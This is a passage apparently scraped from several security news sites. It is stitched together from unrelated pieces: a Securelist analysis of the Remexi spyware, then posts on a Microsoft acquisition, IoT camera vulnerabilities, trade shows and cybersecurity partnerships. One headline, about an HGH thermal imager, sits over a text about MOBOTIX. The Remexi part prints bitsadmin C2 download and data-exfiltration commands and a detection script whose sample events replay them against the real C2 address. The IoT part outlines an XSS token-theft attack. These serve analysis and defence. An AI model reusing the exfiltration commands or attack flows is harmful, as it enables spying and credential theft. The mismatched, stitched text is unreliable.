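ENCRYPTED_CONFIG = xor_cyclic(PLAIN_CONFIG.encode("utf-8"), XOR_KEY)
PLAIN_LOG = b"[upLog.txt] 2018-10-02 12:00:01 keystrokes: ..."
ENCRYPTED_LOG = rc4(rc4_key_from_password(RC4_PASSWORD), PLAIN_LOG)

if __name__ == "__main__":
    cfg = decrypt_config(ENCRYPTED_CONFIG)
    print("C2:", cfg["Servers"], "| zip password:", cfg["ZipPass"])
    print("log:", decrypt_log(ENCRYPTED_LOG).decode())
    print("RC4 self-test:", rc4_selftest())
```

Because XOR and RC4 are both symmetric, the same two functions build the constructed samples and decrypt them; a triage script for a real sample would read config.ini from %APPDATA%\Microsoft\Event Cache and try the key recovered from the binary’s strings. rc4_selftest() checks the cipher routine against a public test vector so that a round trip alone is not mistaken for correctness.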

Main module (events.exe)

SHA256 b1fa803c19aa9f193b67232c9893ea57574a2055791b3de9f836411ce000ce31
MD5 c981273c32b581de824e1fd66a19a281
Compiled GCC compiler in MinGW environment version 2.24, timestamp set to 1970 by compiler
Type I386 Windows GUI EXE
Size 68 608

After checking that the malware is not already installed, it unpacks HCK.cab using the Microsoft standard utility expand.exe with the following arguments:

expand.exe -r "<full path to HCK.cab>" -f:* "<event_cache_dir_path>\"

Then it decrypts config.ini file with a hardcoded 25-byte XOR key that differs for every sample. It sets keyboard and mouse hooks to its handlekeys() and MouseHookProc() functions respectively and starts several working threads:

Thread and description:
1: fetches commands from the C2 with the bitsadmin.exe utility and saves them to a file and to the system registry
2: decrypts the command from the registry using RC4 with a hardcoded key, and executes it
3: moves screenshots from the clipboard to the \Cache005 subdirectory and Unicode text from the clipboard to log.txt, XOR-ed with the “salamati” key (“health” in Farsi)
4: moves screenshots to the \Cache005 subdirectory at the captureScreenTimeOut and captureActiveWindowTimeOut periods
5: checks the network connection, then encrypts and sends the gathered logs
6: unhooks the mouse and keyboard and removes the bitsadmin job
7: checks whether the malware’s working directory has exceeded its size threshold
8: gathers the victim’s credentials, visited-website cache and decrypted Chrome login data, as well as the Firefox databases with cookies, keys, signons and downloads

The malware uses the following command to receive data from its C2:

bitsadmin.exe /TRANSFER HelpCenterDownload /DOWNLOAD /PRIORITY normal <server> <file>

where <server> is built from the configured C2 address and the victim fingerprint as:

http://<server_config>/asp.asp?ui=<host_name>nrg-<adapter_info>-<user_name>

Activity logging module (Splitter.exe)

This module is called from the main thread to obtain screenshots of windows whose titles are specified in the configuration CaptureSites field, bitmaps and text from clipboard, etc.

SHA256 a77f9e441415dbc8a20ad66d4d00ae606faab370ffaee5604e93ed484983d3ff
MD5 1ff40e79d673461cd33bd8b68f8bb5b8
Compiled 2017.08.06 11:32:36 (GMT), 2.22
Type I386 Windows Console EXE
Size 101 888

Rather than implementing this auxiliary module as a dynamic-link library with exported functions, the developers chose a standalone executable that events.exe starts with the following parameters:

Parameter Description
-scr Screenshot file name to save in Cache006 subdirectory, zipped with password from configuration. Can capture all screen (“AllScreen”) or the active window (“ActiveWindow”)
-ms Screenshot file name to save in Cache006 subdirectory, zipped with password from configuration. Specifies the screen coordinates to take
-zip Name of password (from configuration data) protected zip archive
-clipboard Screenshot file name where a bitmap from the clipboard is saved in Cache005 subdirectory, zipped with password from configuration

Data exfiltration

Exfiltration is done through the bitsadmin.exe utility. BITS has shipped with every Windows version from XP through the current Windows 10 releases and exists to run background download/upload jobs, most visibly for Windows Update itself. The following command exfiltrates data from the victim to the C2:

bitsadmin.exe /TRANSFER HelpCenterUpload /UPLOAD /PRIORITY normal "<control_server>/YP01_<victim_fingerprint>_<log_file_name>" "<log_file_name>"
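Detection logic for the persistence, C2 and exfiltration tradecraft described in the sections above, as an added example in Python; it is not part of the report and not code the malware contains. It runs a handful of string rules over constructed process-creation and registry-set events laid out like Sysmon event IDs 1 and 13 (the records, host name, user name and local paths are made up; the IP address is the one from the report’s indicators). The rules look for bitsadmin transfers to a raw IP address, the asp.asp?ui= and YP01_ patterns, schtasks creating a CacheTask_ task, expand.exe unpacking into the Event Cache directory, and writes to the Userinit value, the Run\Microsoft Activity Manager value and the HKCU\SOFTWARE\Microsoft\Fax key.

```python
"""Added example (not from the report): Remexi tradecraft detections over
constructed Sysmon-style telemetry."""
import re

# URL whose host is a bare IPv4 address (no hostname), as in the report's C2.
IP_URL = r"https?://(?:\d{1,3}\.){3}\d{1,3}/"

# Rules applied to the command line of process-creation events (Sysmon ID 1).
PROCESS_RULES = [
    ("bitsadmin_download_from_raw_ip",
     re.compile(r"bitsadmin(?:\.exe)?\b.*?/download\b.*?" + IP_URL, re.I)),
    ("bitsadmin_upload_to_raw_ip",
     re.compile(r"bitsadmin(?:\.exe)?\b.*?/upload\b.*?" + IP_URL, re.I)),
    ("remexi_c2_uri", re.compile(r"/asp\.asp\?ui=", re.I)),
    ("remexi_exfil_filename", re.compile(r"/YP01_", re.I)),
    ("schtasks_cachetask",
     re.compile(r"schtasks(?:\.exe)?\b.*?/create\b.*?CacheTask_", re.I)),
    ("expand_into_event_cache",
     re.compile(r"expand(?:\.exe)?\b.*?Event Cache", re.I)),
]

# Rules applied to the target object of registry-set events (Sysmon ID 13).
REGISTRY_RULES = [
    ("winlogon_userinit_changed", re.compile(r"\\Winlogon\\Userinit$", re.I)),
    ("run_key_microsoft_activity_manager",
     re.compile(r"\\CurrentVersion\\Run\\Microsoft Activity Manager$", re.I)),
    ("fax_key_used_as_command_store",
     re.compile(r"^(?:HKCU|HKU\\[^\\]+)\\SOFTWARE\\Microsoft\\Fax\\", re.I)),
]

# Constructed sample telemetry (not real logs). Host WS01 and user jdoe are
# made up; the IP is the one published in the report's indicators.
EVENTS = [
    {"id": 1, "type": "process", "image": r"C:\Windows\System32\bitsadmin.exe",
     "cmd": r'bitsadmin.exe /TRANSFER HelpCenterDownload /DOWNLOAD /PRIORITY normal '
            r'http://108.61.189.174/asp.asp?ui=WS01nrg-00-11-22-33-44-55-jdoe '
            r'"C:\Users\jdoe\AppData\Roaming\Microsoft\Event Cache\Cache001\cde00.acf"'},
    {"id": 2, "type": "process", "image": r"C:\Windows\System32\bitsadmin.exe",
     "cmd": r'bitsadmin.exe /TRANSFER HelpCenterUpload /UPLOAD /PRIORITY normal '
            r'"http://108.61.189.174/YP01_WS01-jdoe_upLog.txt" "upLog.txt"'},
    {"id": 3, "type": "process", "image": r"C:\Windows\System32\schtasks.exe",
     "cmd": r'schtasks.exe /create /TN "Events\CacheTask_jdoe" /XML '
            r'"C:\Users\jdoe\AppData\Roaming\Microsoft\Event Cache\task.xml" /F'},
    {"id": 4, "type": "process", "image": r"C:\Windows\System32\bitsadmin.exe",  # benign
     "cmd": r'bitsadmin.exe /transfer WUJob /download /priority normal '
            r'https://download.windowsupdate.com/pkg/update.cab C:\Windows\Temp\update.cab'},
    {"id": 5, "type": "process", "image": r"C:\Windows\System32\expand.exe",
     "cmd": r'expand.exe -r "C:\Users\jdoe\AppData\Local\Temp\HCK.cab" -f:* '
            r'"C:\Users\jdoe\AppData\Roaming\Microsoft\Event Cache\"'},
    {"id": 6, "type": "process", "image": r"C:\Windows\System32\schtasks.exe",  # benign
     "cmd": r'schtasks.exe /create /TN "NightlyBackup" /SC DAILY /TR C:\tools\backup.bat'},
    {"id": 7, "type": "registry", "image": r"C:\Users\jdoe\AppData\Roaming\Microsoft\Event Cache\events.exe",
     "target": r"HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Microsoft Activity Manager"},
    {"id": 8, "type": "registry", "image": r"C:\Users\jdoe\AppData\Roaming\Microsoft\Event Cache\events.exe",
     "target": r"HKCU\SOFTWARE\Microsoft\Fax\cmd"},
    {"id": 9, "type": "registry", "image": r"C:\Program Files\Microsoft OneDrive\OneDrive.exe",  # benign
     "target": r"HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\OneDrive"},
    {"id": 10, "type": "registry", "image": r"C:\Users\jdoe\AppData\Roaming\Microsoft\Event Cache\events.exe",
     "target": r"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Userinit"},
]


def scan(events):
    """Return [(event id, [matched rule names])] for events hitting at least one rule."""
    hits = []
    for ev in events:
        if ev["type"] == "process":
            rules, subject = PROCESS_RULES, ev["cmd"]
        else:
            rules, subject = REGISTRY_RULES, ev["target"]
        matched = [name for name, rx in rules if rx.search(subject)]
        if matched:
            hits.append((ev["id"], matched))
    return hits


if __name__ == "__main__":
    for ev_id, names in scan(EVENTS):
        print(f"event {ev_id}: {', '.join(names)}")
```

The bitsadmin-to-raw-IP rules are the generic signal and will also fire on legitimate transfers to bare IP addresses, so in production they are best combined with the URI and file-name patterns or with the parent process; the Fax key rule is deliberately limited to the user hive because Windows’ own fax components write under HKLM\SOFTWARE\Microsoft\Fax.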

Victims

The vast majority of the users targeted by this new variant of Remexi appear to have Iranian IP addresses. Some of these appear to be foreign diplomatic entities based in the country.

Attribution

The Remexi malware has been associated with an APT actor called Chafer by Symantec.

One of the human-readable encryption keys used is “salamati”, probably the Latin-script transliteration of the word for “health” in Farsi. Among the artifacts pointing to the malware authors, we found in the binaries a .pdb path containing the Windows user name “Mohamadreza New”. Interestingly, the FBI’s list of wanted cybercriminals includes two Iranians called Mohammad Reza, although this is a common name and could even be a false flag.

Conclusions

Activity of the Chafer APT group has been observed since at least 2015, but based on things like compilation timestamps and C&C registration, it’s possible they have been active for even longer. Traditionally, Chafer has been focusing on targets inside Iran, although their interests clearly include other countries in the Middle East.

We will continue to monitor how this set of activity develops in the future.

Indicators of compromise

File hashes

events.exe
028515d12e9d59d272a2538045d1f636
03055149340b7a1fd218006c98b30482
25469ddaeff0dd3edb0f39bbe1dcdc46
41b2339950d50cf678c0e5b34e68f537
4bf178f778255b6e72a317c2eb8f4103
7d1efce9c06a310627f47e7d70543aaf
9f313e8ef91ac899a27575bc5af64051
aa6246dc04e9089e366cc57a447fc3a4
c981273c32b581de824e1fd66a19a281
dcb0ea3a540205ad11f32b67030c1e5a

splitter.exe
c6721344af76403e9a7d816502dca1c8
d3a2b41b1cd953d254c0fc88071e5027
1FF40E79D673461CD33BD8B68F8BB5B8
ecae141bb068131108c1cd826c82d88b
12477223678e4a41020e66faebd3dd95
460211f1c19f8b213ffaafcdda2a7295
53e035273164f24c200262d61fa374ca

Domains and IPs

108.61.189.174

Hardcoded mutexes

Local\TEMPDAHCE01
Local\zaapr
Local\reezaaprLog
Local\{Temp-00-aa-123-mr-bbb}

Scheduled task

CacheTask_<user_name_here>

Directory with malicious modules

Main malware directory: %APPDATA%\Microsoft\Event Cache
Commands from C2 in subdirectory: Cache001\cde00.acf

Events.exe persistence records in Windows system registry keys

HKLM\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\Userinit
HKLM\Software\Microsoft\Windows\CurrentVersion\Run\Microsoft Activity Manager

Victims’ fingerprints stored in

HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\PidRegData or
HKCU\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\PidRegData

RC4 encrypted C2 commands stored in

HKCU\SOFTWARE\Microsoft\Fax

HTTP requests template

http://<server_ip_from_config>/asp.asp?ui=<host_name>nrg-<adapter_info>-<user_name>
and bitsadmin.exe transfer jobs to external network resources addressed by raw IP address



Securelist

2019 and Beyond: The (Expanded) RSAC Advisory Board Weighs in on What’s Next: Pt. 2

Part two of RSA’s Conference Advisory Board look into the future tackles how approaches to cybersecurity must evolve to meet new emerging challenges.

Microsoft acquires Citus Data, re-affirming its commitment to Open Source and accelerating Azure PostgreSQL performance and scale

Data and analytics are increasingly at the center of digital transformation, with the most leading-edge enterprises leveraging data to drive customer acquisition and satisfaction, long-term strategic planning, and expansion into net new markets. This digital revolution is placing an incredible demand on technology solutions to be more open, flexible, and scalable to meet the demands of large data volumes, sub-second response times, and analytics driven business insights.

Microsoft is committed to building an open platform that is flexible and provides customers with technology choice to suit their unique needs. Microsoft Azure Data Services are a great example of a place where we have continuously invested in offering choice and flexibility with our fully managed community based open source relational database services, spanning MySQL, PostgreSQL and MariaDB. This builds on our other open source investments in SQL Server on Linux, a multi-model NoSQL database with Azure Cosmos DB, and support for open source analytics with the Spark and Hadoop ecosystems. With our acquisition of GitHub, we continue to expand on our commitment to empower developers to achieve more at every stage of the development lifecycle.

Building on these investments, I am thrilled to announce that we have acquired Citus Data, a leader in the PostgreSQL community. Citus is an innovative open source extension to PostgreSQL that transforms PostgreSQL into a distributed database, dramatically increasing performance and scale for application developers. Because Citus is an extension to open source PostgreSQL, it gives enterprises the performance advantages of a horizontally scalable database while staying current with all the latest innovations in PostgreSQL. Citus is available as a fully-managed database as a service, as enterprise software, and as a free open source download.

Since the launch of Microsoft’s fully managed community-based database service for PostgreSQL in March 2018, its adoption has surged. Earlier this month, PostgreSQL was named DBMS of the Year by DB-Engines, for the second year in a row. The acquisition of Citus Data builds on Azure’s open source commitment and enables us to provide the massive scalability and performance our customers demand as their workloads grow.

Together, Microsoft and Citus Data will further unlock the power of data, enabling customers to scale complex multi-tenant SaaS applications and accelerate the time to insight with real-time analytics over billions of rows, all with the familiar PostgreSQL tools developers know and love.

I am incredibly excited to welcome the high-caliber Citus Data team to Microsoft! Working together, we will accelerate the delivery of key, enterprise-ready features from Azure to PostgreSQL and enable critical PostgreSQL workloads to run on Azure with confidence. We continue to be energized by building on our promise around Azure as the most comprehensive cloud to run open source and proprietary workloads at any scale and look forward to working with the PostgreSQL community to accelerate innovation to customers.

For more information on Citus Data, you can read the blog post from Umur Cubukcu, CEO and co-founder, here.

The post Microsoft acquires Citus Data, re-affirming its commitment to Open Source and accelerating Azure PostgreSQL performance and scale appeared first on The Official Microsoft Blog.

Threat Spotlight: IoT Application Vulnerabilities Leave IOT Devices Open To Attack.

IoT devices were popular gifts again this holiday season. An acronym for Internet of Things, IoT is more than a buzzword. The trend represents a huge shift in how products are made and used, as network connectivity is added to products that were not previously intended to have this functionality. So, your refrigerator that sends you a text message when you’re out of milk: IoT. Your thermostat that provides usage graphs on your phone: yep, IoT. Basically, any consumer device capable of connecting to a network other than a computer, phone, tablet, or router is considered an IoT device.

Security has been a big concern with IoT devices, though. Although improvements have been made, new types of vulnerabilities remain. For example, the Barracuda Labs teams recently used an IoT security camera to help illustrate a new threat: IoT credential compromise, which uses web and mobile application vulnerabilities to compromise IoT devices.

Highlighted Threat:

IoT credential compromise — Attackers can use vulnerabilities in the web applications and mobile applications used by certain IoT devices to acquire credentials, which can then be used to view the video feed, set/receive/delete alarms, remove saved video clips from cloud storage, and read account information. Attackers can also use the credentials to push their own firmware update to the device, changing its functionality and using the compromised device to attack other devices on the same network.

The Details:

To illustrate this threat, the Barracuda Labs team recently conducted research on a connected security camera and identified multiple vulnerabilities in the camera’s web app and mobile app ecosystem:

Mobile app ignores server certificate validity
Cross-site scripting (XSS) in the web app
File traversal in a cloud server
User controls device update link
Device updates are not signed
Device ignores server certificate validity

Using these vulnerabilities, the team was able to perform the following attacks to acquire credentials and compromise an IoT device, all without a direct connection to the device itself.

Acquiring credentials from the mobile app

If an attacker can intercept traffic to the mobile app by using a compromised or hostile network, they can easily acquire the user password. Here’s how it works:

The victim connects to a compromised/hostile network with a mobile phone.
The connected camera app tries to connect to the vendor’s servers over HTTPS.
The hostile/compromised network routes the connection to the attacker’s server, which presents its own SSL certificate and proxies the communication to the vendor’s server.
The attacker’s server now holds an unsalted MD5 hash of the user password.
The attacker can also tamper with the communication between the vendor’s server and the app.
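The step that makes this interception work is the app accepting the attacker’s certificate. The following Go sketch is an added example, not the vendor app’s or Barracuda’s code, with hypothetical names: it puts the weak client setting (verification off) beside a client pinned to the vendor CA, and uses an httptest server with a self-signed certificate as a stand-in for the attacker’s proxy.

```go
package main

import (
	"crypto/tls"
	"crypto/x509"
	"errors"
	"fmt"
	"io"
	"net/http"
	"net/http/httptest"
	"time"
)

// TLSPolicy is the client-side setting that decides whether the interception
// described above succeeds. Names are hypothetical; this is not the app's code.
type TLSPolicy struct {
	// SkipVerify reproduces the weak setting ("ignores server certificate validity"):
	// any certificate, including one minted by the attacker's proxy, is accepted.
	SkipVerify bool
	// Roots, when non-nil, is the only set of CAs the client trusts. Pinning the
	// vendor's CA here means a certificate from anyone else fails verification.
	Roots *x509.CertPool
}

// Fetch performs a GET against rawURL under the given policy and returns the body.
func Fetch(rawURL string, p TLSPolicy) (string, error) {
	cfg := &tls.Config{
		MinVersion:         tls.VersionTLS12,
		InsecureSkipVerify: p.SkipVerify, // the vulnerable setting when true
		RootCAs:            p.Roots,      // nil falls back to the system trust store
	}
	client := &http.Client{
		Transport: &http.Transport{TLSClientConfig: cfg},
		Timeout:   5 * time.Second,
	}
	resp, err := client.Get(rawURL)
	if err != nil {
		return "", err
	}
	defer resp.Body.Close()
	body, err := io.ReadAll(resp.Body)
	if err != nil {
		return "", err
	}
	return string(body), nil
}

// IsUntrustedCert reports whether err is the certificate-chain failure a
// correctly configured client raises when it meets the attacker's proxy.
func IsUntrustedCert(err error) bool {
	var unknown x509.UnknownAuthorityError
	return errors.As(err, &unknown)
}

// PinnedTo returns a policy that trusts only the given certificates (the app's
// pinned vendor CA). With no arguments nothing is trusted, which is how the
// attacker's self-signed proxy certificate looks to a pinned client.
func PinnedTo(certs ...*x509.Certificate) TLSPolicy {
	pool := x509.NewCertPool()
	for _, c := range certs {
		pool.AddCert(c)
	}
	return TLSPolicy{Roots: pool}
}

// NewFakeVendor is a constructed stand-in for the vendor API. httptest serves it
// with a self-signed certificate no trust store knows, so to a default client it
// looks exactly like an attacker's proxy would.
func NewFakeVendor(body string) *httptest.Server {
	return httptest.NewTLSServer(http.HandlerFunc(func(w http.ResponseWriter, _ *http.Request) {
		fmt.Fprint(w, body)
	}))
}

func main() {
	srv := NewFakeVendor(`{"session":"constructed-token"}`)
	defer srv.Close()

	// Weak app: verification off, so the "proxy" is accepted and the session leaks.
	body, err := Fetch(srv.URL, TLSPolicy{SkipVerify: true})
	fmt.Printf("InsecureSkipVerify: body=%q err=%v\n", body, err)

	// Correct app pinned to a vendor CA that did not sign the proxy's certificate:
	// the handshake is refused before any credential is sent.
	_, err = Fetch(srv.URL, PinnedTo())
	fmt.Printf("pinned, wrong issuer: untrustedCert=%v\n", IsUntrustedCert(err))

	// Correct app talking to the genuine vendor: pinned CA matches, request succeeds.
	body, err = Fetch(srv.URL, PinnedTo(srv.Certificate()))
	fmt.Printf("pinned, genuine server: body=%q err=%v\n", body, err)
}
```

Even with verification fixed, sending an unsalted MD5 of the password is still a weak credential design; the pinning only stops the interception path described above.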

Acquiring credentials from the web app

This type of attack relies on functionality that allows users to share device access to the connected camera with other users. To share a device, the receiver needs to have a valid account with the IoT vendor, and the sender needs to know the receiver’s username, which happens to be an email address.

The attacker will embed an XSS exploit in a device name and then share that device with the victim.
Once the victim logs into his account using the web app, the XSS exploit will execute and share the access token (which is stored as a variable on the web app) with the attacker.
With that access token, the attacker can access the victim’s account and all its registered devices.

Through this research, the Barracuda Labs team managed to compromise an IoT device (connected camera) without any direct connection to the device itself. This makes life easier for attackers. No more scanning on Shodan for vulnerable devices. Instead, the attack will be performed against the vendor’s infrastructure. It’s a threat that could affect other types of IoT devices as well, regardless of their function, because it takes advantage of the way the device communicates with the cloud.

After all, bugs are not inherent to products, rather to processes, skills, and awareness of the developers. As access and access controls for IoT devices shifted to cloud services, so did the vulnerabilities, making possible the types of attacks uncovered by the Barracuda Labs team.

Lessons for IoT manufacturers

Vendors creating IoT solutions need to protect all aspects of the applications used to run those devices. IoT devices are sensors distributed in homes, schools, and offices, and they’re potential entry points for attackers. Each customer’s network is an opening to the server core and to other customers.

A web application firewall, one of the most critical protections IoT vendors need to put in place, is designed to protect servers from HTTP traffic at layer 7. Manufacturers also need to ramp up protection against network layer attacks and phishing.

Cloud security is also important, providing visibility, protection, and remediation of IoT applications and the infrastructures they run on. The potential for lateral-movement exposure is large and complex, so taking proper security precautions is key.
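Three of the findings listed above sit on the update path (user controls the update link, updates are not signed, device ignores certificate validity), and together they are what lets stolen credentials become a hostile firmware push. As an added example, not Barracuda’s or any vendor’s code and with a hypothetical descriptor format and names, this Go sketch shows the device-side checks that close the first two: an https-only host allowlist, an ed25519 signature binding version and digest, anti-rollback, and a digest check on the downloaded bytes. The TLS certificate check belongs in the device’s HTTP client and is not repeated here.

```go
package main

import (
	"crypto/ed25519"
	"crypto/rand"
	"crypto/sha256"
	"encoding/binary"
	"errors"
	"fmt"
	"net/url"
)

// UpdateDescriptor is the (hypothetical) message the cloud pushes to the device:
// where to fetch the image, its version, its digest, and a vendor signature.
type UpdateDescriptor struct {
	URL       string
	Version   uint32
	SHA256    [32]byte
	Signature []byte // ed25519 over signingInput(Version, SHA256)
}

// Device holds the state a manufacturer burns in at build time (constructed here).
type Device struct {
	VendorPub      ed25519.PublicKey // verification key only; no secret on the device
	AllowedHosts   map[string]bool   // the update link may only point at these hosts
	CurrentVersion uint32            // for anti-rollback
}

var (
	ErrBadURL       = errors.New("update URL is not https or not on a vendor host")
	ErrBadSignature = errors.New("update descriptor signature does not verify")
	ErrRollback     = errors.New("update version is not newer than the installed one")
	ErrHashMismatch = errors.New("downloaded image does not match the signed digest")
)

// signingInput binds version and digest together so neither can be swapped alone.
func signingInput(version uint32, sum [32]byte) []byte {
	buf := make([]byte, 4, 4+len(sum))
	binary.BigEndian.PutUint32(buf, version)
	return append(buf, sum[:]...)
}

// CheckDescriptor performs every check possible before a single byte is downloaded.
func (d *Device) CheckDescriptor(u UpdateDescriptor) error {
	parsed, err := url.Parse(u.URL)
	if err != nil || parsed.Scheme != "https" || !d.AllowedHosts[parsed.Hostname()] {
		return ErrBadURL // closes the "user controls device update link" hole
	}
	if !ed25519.Verify(d.VendorPub, signingInput(u.Version, u.SHA256), u.Signature) {
		return ErrBadSignature // closes the "device updates are not signed" hole
	}
	if u.Version <= d.CurrentVersion {
		return ErrRollback // a genuinely signed but older image is still refused
	}
	return nil
}

// VerifyImage is the last gate before flashing: the image must hash to the
// digest the vendor signed, even if it came from an allowed host over TLS.
func (d *Device) VerifyImage(u UpdateDescriptor, image []byte) error {
	if err := d.CheckDescriptor(u); err != nil {
		return err
	}
	if sha256.Sum256(image) != u.SHA256 {
		return ErrHashMismatch
	}
	return nil
}

// NewVendorKey and SignDescriptor are the vendor's build-server side, included
// only so the example runs offline; the private key never reaches a device.
func NewVendorKey() (ed25519.PublicKey, ed25519.PrivateKey) {
	pub, priv, err := ed25519.GenerateKey(rand.Reader)
	if err != nil {
		panic(err)
	}
	return pub, priv
}

func SignDescriptor(priv ed25519.PrivateKey, rawURL string, version uint32, image []byte) UpdateDescriptor {
	sum := sha256.Sum256(image)
	return UpdateDescriptor{URL: rawURL, Version: version, SHA256: sum,
		Signature: ed25519.Sign(priv, signingInput(version, sum))}
}

func main() {
	pub, priv := NewVendorKey()
	dev := &Device{VendorPub: pub, AllowedHosts: map[string]bool{"updates.vendor.example": true}, CurrentVersion: 7}
	image := []byte("constructed firmware image, version 8")
	good := SignDescriptor(priv, "https://updates.vendor.example/fw/8.bin", 8, image)
	fmt.Println("genuine update:", dev.VerifyImage(good, image))
	hijacked := good
	hijacked.URL = "http://attacker.invalid/fw.bin" // user-supplied link to a foreign host
	fmt.Println("hijacked link:", dev.CheckDescriptor(hijacked))
	fmt.Println("tampered image:", dev.VerifyImage(good, []byte("backdoored image")))
}
```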

How to protect yourself as a consumer

When buying an IoT device, consumers need to think about security, in addition to convenience and price. Here are a few tips to consider:

Research the device manufacturer — A few companies that produce IoT devices understand software security. Most are either existing companies whose expertise lies in making the physical products that are being connected or startups trying to bring devices to market as quickly as possible. In both cases, proper software and network security measures are often overlooked.
Look for existing vulnerabilities in a vendor’s other devices — If one device has a vulnerability, it’s likely other devices with similar features from the same company are also vulnerable. Ultimately, a vendor that has a history of secure devices will likely build secure devices going forward.
Evaluate responses to past vulnerabilities — If a vendor is responsive to people reporting a vulnerability and quickly resolves it with a firmware update, it bodes well for their outlook on security and the future products they make.

Unfortunately, the amount of information available about the security posture of IoT devices is astonishingly low. Ideally, we need to get to a world where IoT products are all scored with a safety rating, just like cars. Consumers should be informed before they invest in IoT devices.

The post Threat Spotlight: IoT Application Vulnerabilities Leave IOT Devices Open To Attack. appeared first on IT Security Guru.

HGH Infrared Systems’ Unprecedented Showcase Of SPYNEL Thermal Imager At Africa’s Biggest Security And Defence Exhibition.

Intersec Dubai, 20 – 22 January 2019, Dubai International Convention & Exhibition Centre, Hall S1, Booth K34. MOBOTIX is exhibiting for the 12th time at intersec Dubai 2019. They are showcasing their solutions to this worldwide event which has shown a continuous growing and evolving trend over the past years.

Along with the latest product releases and new innovations such as MOBOTIX NAS, MOBOTIX MOVE Range, the next generation video management software MOBOTIX Management Center (MxMC) 2.0, MOBOTIX is providing a deeper look into solutions applicable to all industries and needs that include:

• Facial Recognition
• A.I.
• Biometric Solutions
• Remote Power
• Surveillance Tower Fuel Cell Integrations
• Solar/Power Plant monitoring and analysis
• Storage

Together with their Technology and Solution Partners, MOBOTIX is demonstrating this array of new solutions at the show. The MOBOTIX solution for any application shows the versatility and flexibility of the products being offered.

“We’re always excited to be exhibiting at intersec Dubai, 12 years now. The UAE is a hub of technology innovation” says Phillip Antoniou, Vice President Sales Europe South/West & MEA, “We are looking forward to showing the true Cyber Security features of our solutions and the open flexibility we can utilize with our partners which bring new meaning to being an open solution focused company.”

On show are the supplementary MOBOTIX MOVE camera range along with the premium video systems for the Mx6 technology platform, plus the new MOBOTIX NAS devices and MxMC 2.0. With MxMC 2.0 it is now possible to combine, in a unique, compatible hybrid solution, not only the intelligent decentralized MOBOTIX IoT cameras but also the MOBOTIX MOVE cameras, third-party ONVIF S cameras and the new MOBOTIX NAS devices.

An exclusive feature of the NAS devices from MOBOTIX is that they are pre-installed with the MxMC interface software, which facilitates centralized access to all camera recordings via an MxMC client. This applies to the decentralized MOBOTIX IoT cameras as well as to the MOBOTIX MOVE series and/or those supplied by third parties.

About MOBOTIX

All over the world sites are protected by using MOBOTIX IP video technology. It delivers absolute reliability even in the most challenging conditions. From oil rigs in the North Sea to World Heritage Sites in remote deserts, whether it is helping scientists at an Arctic research centre or greeting climbers at the top of Mount Everest, MOBOTIX equipment is designed for durability to provide the best overall return on investment. An extended operating lifetime is guaranteed and further enhanced by continual software upgrades.

The post HGH Infrared Systems’ Unprecedented Showcase Of SPYNEL Thermal Imager At Africa’s Biggest Security And Defence Exhibition. appeared first on IT Security Guru.

Plexal Bolsters Global Cybersecurity Hub With Two International Partnerships.

Innovation centre Plexal, which delivers LORCA, the government-backed cybersecurity programme, today announces partnerships with the Global Cyber Alliance, City of New York, and the New York Economic Development Corporation. The partnerships are designed to help cybersecurity companies scale internationally while also expanding Plexal’s role as a major global cybersecurity cluster.

Plexal is announcing that the Global Cyber Alliance (GCA) has become a supporting partner, meaning that Plexal members and members of the LORCA cohort will benefit from access to the alliance’s global partners (of which there are over 200), such as Bank of America, IBM, KPMG, Microsoft and Sony. As well as mentoring and networking opportunities, the GCA will bring a wealth of cybersecurity expertise from government and the private sector to share with cyber innovators in Plexal’s network to help them shape their products into viable solutions that solve real-world challenges.

Plexal is also announcing its partnership with the City of New York Mayor’s Office of the Chief Technology Officer and the New York Economic Development Corporation. This will see Plexal be the UK lead for the NYCx Cybersecurity Moonshot Challenge, with a focus on creating better cybersecurity solutions for SMEs. Plexal will both ensure UK innovators are well represented as challenge participants and also act as the primary UK landing pad for challenge winners. Plexal will provide consultation, demo opportunities and a base for winners to develop in the UK through free coworking space and support at Plexal’s hub at Here East, London. The partnership will establish strong connections between cyber innovators based in NYC and the UK, enabling sharing of knowledge and resources that is vital to solving cybersecurity challenges on a global scale.

Global cooperation at LORCA
These partnerships build on the launch of the London Office for Rapid Cybersecurity Advancement (LORCA) in June 2018, hosted and delivered by Plexal with £13.5m of funding from the Department for Digital, Culture, Media & Sport (DCMS). As the UK’s dedicated space for industry-led cybersecurity innovation, LORCA supports the most promising cybersecurity innovators in scaling and growing solutions to meet the most pressing industry challenges. In terms of its international remit, LORCA’s Industry Advisory Board includes representation from Cyber Spark (the Israeli cyber hub) and the National University of Singapore, among others. LORCA also works closely with the Department for International Trade and the Foreign and Commonwealth Office to connect LORCA members to international networks through delegations and trade missions.

Andrew Roughan, Managing Director of LORCA, says: “Sharing knowledge and being open to cooperation between global cyber innovators and industry is more important than ever. We’re looking forward to deepening our links with new global partners and acting as the UK landing pad and connector. These important partnerships with the New York Development Corporation and the Global Cyber Alliance will mean the emerging cyber stars we support can have even greater direct access to new markets and the networks they need to succeed.”

Andy Bates, GCA Executive Director for UK and EMEA, Global Cyber Alliance, says: “Innovation and entrepreneurship are key to shoring up cyber defences. GCA is pleased to partner with Plexal and LORCA and participate in their program to work with scaleups working on cybersecurity challenges.”

James Patchett, President and CEO at the New York City Economic Development Corporation, says: “Cybersecurity is one of our world’s greatest threats, and we need to be ambitious about protecting ourselves. That’s why we’re making New York City a hotbed for cyber innovation, to protect every New Yorker and every business – all while creating good-paying jobs. We’re proud to help launch this important challenge, which will benefit New York City and create game-changing technology for the world to share.”

The post Plexal Bolsters Global Cybersecurity Hub With Two International Partnerships. appeared first on IT Security Guru.

SolutionsPT To Host Cryptomining Webinar For OT Professionals.

Industrial IT software provider SolutionsPT will host a free webinar exploring the evolving cyber security threat posed by Cryptomining infections and how they can be prevented, on Thursday, February 21st.

Designed for Operational Technology (OT) professionals, the Introduction to Cryptomining webinar will examine the specific threat Cryptomining poses to OT environments and discuss the solutions that will enable organisations to guard against it.

Cryptomining is a malware threat that affects Industrial Control Systems (ICS), enabling hackers to use an infected PC’s resources to mine for digital currency. The webinar will explore how, if left unchecked, the infections can disrupt OT environments, causing hardware failure, massively increasing energy consumption and preventing systems from carrying out mission-critical tasks.

